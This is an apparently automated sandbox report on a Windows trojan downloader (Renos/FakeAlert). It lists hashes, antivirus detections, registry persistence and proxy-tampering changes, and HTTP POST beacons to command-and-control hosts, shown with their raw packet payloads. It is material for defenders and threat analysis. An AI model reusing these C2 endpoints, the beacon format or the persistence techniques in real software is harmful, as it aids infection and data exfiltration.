Analysis Date2014-06-13 11:42:35
MD54a98defe3e34fbc4a408a8e227ae0210
SHA145cb6b22158ebe8901cd53e9b7c970040a5ae1c7

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
SectionCODE md5: 5784dae20cafcbaadcd8b70e59ba63bb sha1: 24f6c4532abdb27b640306ea99286323e858cbb3 size: 13824
SectionDATA md5: a6ec4b249cf8d0f304c0ddd8e4953a55 sha1: f1b0c655d9903cbc9bd410e70f2058133c77eb22 size: 152576
SectionBSS md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.idata md5: b94686157c362e1064997ba3a74c7bf4 sha1: df3e3125701266d72b3d890023b6e1e298a7a6d2 size: 1536
Section.edata md5: 9f2f69c0b89ae81467ec477a44814da0 sha1: 8544f18236cb6f5b6d740da1a0420be1e528f2ff size: 512
Section.reloc md5: 4e00a3a256e224a2c7259497734ff216 sha1: c9e93c6dff616795fd8bb8b35de011b156847f39 size: 512
Section.rsrc md5: 8359b413f1955241932c9f7cfc48f917 sha1: 2bddf61ed4e7e1ad6036c71ac60d2e04bf886d8a size: 1024
Timestamp1992-06-19 22:22:17
PEhashe2e9b994914e1ea46bad10e0ff22bf5821f1a3ec
IMPhash0f13239fcb90722a0b38cfe05258a22f
AV360 SafeGen:Trojan.Heur.Renos.kCW@cqZetpbc
AV360 SafeGen:Trojan.Heur.Renos.kCW@cqZetpbc
AVAd-AwareGen:Trojan.Heur.Renos.kCW@cqZetpbc
AVAd-AwareGen:Trojan.Heur.Renos.kCW@cqZetpbc
AVAlwil (avast)Kryptik-BOC [Trj]
AVAlwil (avast)Kryptik-BOC [Trj]
AVArcabit (arcavir)no_virus
AVArcabit (arcavir)no_virus
AVAuthentiumW32/FakeAlert.NH.gen!Eldorado
AVAuthentiumW32/FakeAlert.NH.gen!Eldorado
AVAvira (antivir)TR/Crypt.XPACK.Gen2
AVAvira (antivir)TR/Crypt.XPACK.Gen2
AVCA (E-Trust Ino)Win32/FakeAlert.I!generic
AVCA (E-Trust Ino)Win32/FakeAlert.I!generic
AVCAT (quickheal)Trojan.Renos.PG
AVCAT (quickheal)Trojan.Renos.PG
AVClamAVTrojan.Agent-270755
AVClamAVTrojan.Agent-270755
AVDr. WebTrojan.DownLoader2.34358
AVDr. WebTrojan.DownLoader2.34358
AVEmsisoftGen:Trojan.Heur.Renos.kCW@cqZetpbc
AVEmsisoftGen:Trojan.Heur.Renos.kCW@cqZetpbc
AVEset (nod32)Win32/Kryptik.MRH
AVEset (nod32)Win32/Kryptik.MRH
AVFortinetW32/CodecPack.ATMJ!tr
AVFortinetW32/CodecPack.ATMJ!tr
AVFrisk (f-prot)W32/FakeAlert.NH.gen!Eldorado (generic, not disinfectable)
AVFrisk (f-prot)W32/FakeAlert.NH.gen!Eldorado (generic, not disinfectable)
AVF-SecureGen:Trojan.Heur.Renos.kCW@cqZetpbc
AVF-SecureGen:Trojan.Heur.Renos.kCW@cqZetpbc
AVGrisoft (avg)Generic22.FUO
AVGrisoft (avg)Generic22.FUO
AVIkarusTrojan-Downloader.Win32.Renos
AVIkarusTrojan-Downloader.Win32.Renos
AVKasperskyTrojan.Win32.Generic
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesno_virus
AVMalwareBytesno_virus
AVMcafeeDownloader-CEW.ak
AVMcafeeDownloader-CEW.ak
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Renos.PG
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Renos.PG
AVMicroWorld (escan)Gen:Trojan.Heur.Renos.kCW@cqZetpbc
AVMicroWorld (escan)Gen:Trojan.Heur.Renos.kCW@cqZetpbc
AVNormanwinpe/Kryptik.NP
AVNormanwinpe/Kryptik.NP
AVRisingno_virus
AVRisingno_virus
AVSophosMal/FakeAV-IV
AVSophosMal/FakeAV-IV
AVSymantecTrojan.Gen.2
AVSymantecTrojan.Gen.2
AVTrend MicroTROJ_KRYPTK.SMCA
AVTrend MicroTROJ_KRYPTK.SMCA
AVVirusBlokAda (vba32)BScope.Trojan.PEH.0231

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\malware.exe
Creates MutexGlobal\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex{A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\0ESKOMO9JO ➝
C:\malware.exe
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL
RegistryHKEY_CURRENT_USER\Software\0ESKOMO9JO\OteH ➝
xC7aKZ+O6wyPlq1krRM4sG7m2LFGsYtHjHOagBf10Uk/n4gL8s8xs9LeD5KQVh3/j+XFa0mnr175UElKKyciA2gn6tUEA721Fj4P\\x00
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\WINDOWS\Tasks\{22116563-108C-42c0-A7CE-60161B75E508}.job
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexGlobal\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}
Winsock DNSlacvictoria.com
Winsock DNSqqplot.com
Winsock DNS42.212.132.186

Network Details:

DNSwsj.com
Type: A
205.203.132.1
DNSwsj.com
Type: A
205.203.132.65
DNSwsj.com
Type: A
205.203.140.1
DNSwsj.com
Type: A
205.203.140.65
DNSfastclick.com
Type: A
64.156.167.84
DNSnifty.com
Type: A
210.131.4.217
DNSqqplot.com
Type: A
109.74.195.149
DNSbonreligion.com
Type: A
54.209.129.218
DNSlacvictoria.com
Type: A
DNSpaulo-fg.com
Type: A
HTTP POSThttp://qqplot.com/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP POSThttp://42.212.132.186/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP192.168.1.1:1031 ➝ 109.74.195.149:80
Flows TCP192.168.1.1:1032 ➝ 42.212.132.186:80

Raw Pcap
0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   7171706c 6f742e63 6f6d0d0a 436f6e74   qqplot.com..Cont
0x000000b0 (00176)   656e742d 4c656e67 74683a20 3334310d   ent-Length: 341.
0x000000c0 (00192)   0a436f6e 6e656374 696f6e3a 204b6565   .Connection: Kee
0x000000d0 (00208)   702d416c 6976650d 0a436163 68652d43   p-Alive..Cache-C
0x000000e0 (00224)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x000000f0 (00240)   0d0a0d0a 64617461 3d2f436a 45665a44   ....data=/CjEfZD
0x00000100 (00256)   53767871 43694b30 6c74554d 31757932   SvxqCiK0ltUM1uy2
0x00000110 (00272)   2f797534 55355970 4e6d3176 2f2f6a54   /yu4U5YpNm1v//jT
0x00000120 (00288)   6e675663 2b774d73 2b2b5a42 6a375a53   ngVc+wMs++ZBj7ZS
0x00000130 (00304)   59547233 69426b47 2f672b37 5643432f   YTr3iBkG/g+7VCC/
0x00000140 (00320)   31396b66 694f4870 37655263 48506959   19kfiOHp7eRcHPiY
0x00000150 (00336)   6f393930 4d55756a 67555734 62765449   o990MUujgUW4bvTI
0x00000160 (00352)   644e2f6a 50587547 506a6142 7a786c63   dN/jPXuGPjaBzxlc
0x00000170 (00368)   63356d70 4e303161 36742f51 69535858   c5mpN01a6t/QiSXX
0x00000180 (00384)   77707a39 486d306b 7a396642 6661556e   wpz9Hm0kz9fBfaUn
0x00000190 (00400)   3130782f 474c636f 66526948 344c7646   10x/GLcofRiH4LvF
0x000001a0 (00416)   73416947 59467361 696f4d57 30374b30   sAiGYFsaioMW07K0
0x000001b0 (00432)   4533726b 6b334d65 5a557967 44654c47   E3rkk3MeZUygDeLG
0x000001c0 (00448)   77327331 322b6f50 4d4e726e 4a5a637a   w2s12+oPMNrnJZcz
0x000001d0 (00464)   687a5a38 78694e57 75355467 4f687134   hzZ8xiNWu5TgOhq4
0x000001e0 (00480)   4f715553 30424d54 644b3262 5a792f68   OqUS0BMTdK2bZy/h
0x000001f0 (00496)   7833546e 6d477954 464c4868 4c635266   x3TnmGyTFLHhLcRf
0x00000200 (00512)   2b76417a 494f424e 6d763433 43444b32   +vAzIOBNmv43CDK2
0x00000210 (00528)   51303541 56636d41 38324b68 54665573   Q05AVcmA82KhTfUs
0x00000220 (00544)   732f476f 6c77786c 6d396b4c 6e726e6c   s/Golwxlm9kLnrnl
0x00000230 (00560)   49367034 366e3336 642f3334 6b705656   I6p46n36d/34kpVV
0x00000240 (00576)   32623651 672f413d 3d                  2b6Qg/A==

0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   34322e32 31322e31 33322e31 38360d0a   42.212.132.186..
0x000000b0 (00176)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x000000c0 (00192)   3334310d 0a436f6e 6e656374 696f6e3a   341..Connection:
0x000000d0 (00208)   204b6565 702d416c 6976650d 0a436163    Keep-Alive..Cac
0x000000e0 (00224)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000f0 (00240)   61636865 0d0a0d0a 64617461 3d2f436a   ache....data=/Cj
0x00000100 (00256)   45665a44 53767871 43694b30 6c74554d   EfZDSvxqCiK0ltUM
0x00000110 (00272)   31757932 2f797534 55355970 4e6d3176   1uy2/yu4U5YpNm1v
0x00000120 (00288)   2f2f6a54 6e675663 2b774d73 2b2b5a42   //jTngVc+wMs++ZB
0x00000130 (00304)   6a375a53 59547233 69426b47 2f672b37   j7ZSYTr3iBkG/g+7
0x00000140 (00320)   5643432f 31396b66 694f4870 37655263   VCC/19kfiOHp7eRc
0x00000150 (00336)   48506959 6f393930 4d55756a 67555734   HPiYo990MUujgUW4
0x00000160 (00352)   62765449 644e2f6a 50587547 506a6142   bvTIdN/jPXuGPjaB
0x00000170 (00368)   7a786c63 63356d70 4e303161 36742f51   zxlcc5mpN01a6t/Q
0x00000180 (00384)   69535858 77707a39 486d306b 7a396642   iSXXwpz9Hm0kz9fB
0x00000190 (00400)   6661556e 3130782f 474c636f 66526948   faUn10x/GLcofRiH
0x000001a0 (00416)   344c7646 73416947 59467361 696f4d57   4LvFsAiGYFsaioMW
0x000001b0 (00432)   30374b30 4533726b 6b334d65 5a557967   07K0E3rkk3MeZUyg
0x000001c0 (00448)   44654c47 77327331 322b6f50 4d4e726e   DeLGw2s12+oPMNrn
0x000001d0 (00464)   4a5a637a 687a5a38 78694e57 75355467   JZczhzZ8xiNWu5Tg
0x000001e0 (00480)   4f687134 4f715553 30424d54 644b3262   Ohq4OqUS0BMTdK2b
0x000001f0 (00496)   5a792f68 7833546e 6d477954 464c4868   Zy/hx3TnmGyTFLHh
0x00000200 (00512)   4c635266 2b76417a 494f424e 6d763433   LcRf+vAzIOBNmv43
0x00000210 (00528)   43444b32 51303541 56636d41 38324b68   CDK2Q05AVcmA82Kh
0x00000220 (00544)   54665573 732f476f 6c77786c 6d396b4c   TfUss/Golwxlm9kL
0x00000230 (00560)   6e726e6c 49367034 366e3336 642f3334   nrnlI6p46n36d/34
0x00000240 (00576)   6b705656 32623651 672f413d 3d         kpVV2b6Qg/A==


Strings
u....A
.."
.IpTt
....
.g...n.F.Mo..HXh....s.o(n
a.Xq
.c.
J.0(..F..tu

0_GL
*}0K
0+[O:
1=# 
3(d9r\
4q7E
`;5guO
=5Wm
6A1z
/ 6j
6&`o
7K!b
7Q!a:
8QtE
ar=.
>?BJ
bmWo/
Bp.!
c2}u!
#cJd
E0y-
{E9{
:E~g
#f_*
FO^p
)f@z
G29y
G}e4o
h>QF
I{y&.
J+&:
jOP2
jV=x
KG6r
kpxA
}(.L
LDYj2"
l'e:
[O(&
p`1u
/@R;
rNG(
rQfS
rz3j?
sxOu
&.T]
t;98
U1cQ
^uB&{
ujnC
uV~]
W25`
WkX@D-
&&W/N'
W	QX
x0.	
(x,D
XNeY
XVP[
ycmQ
}Y	V
zA@t
0$1*1B2t4{4
0&3+31373
2&2.262>2F2N2V2^2f2n2v2~2
4&7-7@7
5#5)5/555;5A5G5M5S5Y5
676898c6
7D8L8U8
834140862
8#8/868<8F8L8T8Z8a8j8q8x8
[8q/-Qj
9"9)9E:
  </application> 
  <application> 
</assembly>
   <assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Windows Setup UAC" type="win32"/>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> 
AssocQueryStringByKeyW
BCKABH8t$
BCKHJG:l$
Boolean
$B)%.z
]c8r+Yg
</compatibility> 
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"> 
CreateWindowExA
DefineDosDeviceA
DialogBoxIndirectParamW
DisconnectNamedPipe
DispatchMessageA
.edata
EnumDateFormatsExW
EnumDesktopsA
ExtractAssociatedIconExW
F4U199
<?=F=Q=`=o=
ft%CJA
fweerthrtgr
*g44|`
GetCaretBlinkTime
GetConsoleTitleW
GetNumaAvailableMemoryNode
GetProcAddress
GetUserDefaultLCID
GlobalFix
HAK@:t$
HIAI8T$
.idata
IL}pH!
IMaaaK
JGG;t$
kernel32.dll
keybd_event
LoadLibraryA
LoadLibraryExA
LocalAlloc
LocalFree
lstrcmpiA
mouse_event
(|n,+++
OABH8\$
OpenAs_RunDLLW
PathRemoveArgsW
PathRemoveBackslashW
P.reloc
P.rsrc
ReadConsoleInputA
RemovePropA
            <requestedExecutionLevel level="highestAvailable"/> 
         </requestedPrivileges>
         <requestedPrivileges>
*>s+++
      </security>
      <security>
SetClassLongW
SetEndOfFile
SetEnvironmentVariableA
SetWindowsHookW
shell32.dll
SHEnumKeyExW
SHEnumValueW
SHGetNewLinkInfo
SHHelpShortcuts_RunDLLA
shlwapi.dll
StrCmpW
StrRStrIA
StrStrIA
StrToIntW
      <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/> 
      <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/> 
    <!--The ID below indicates application support for Windows 7 --> 
    <!--The ID below indicates application support for Windows Vista --> 
This program must be run under Win32
T$(I95
   </trustInfo>
      <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
user32.dll
VerifyVersionInfoW
VirtualAllocEx
xmax.exe
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>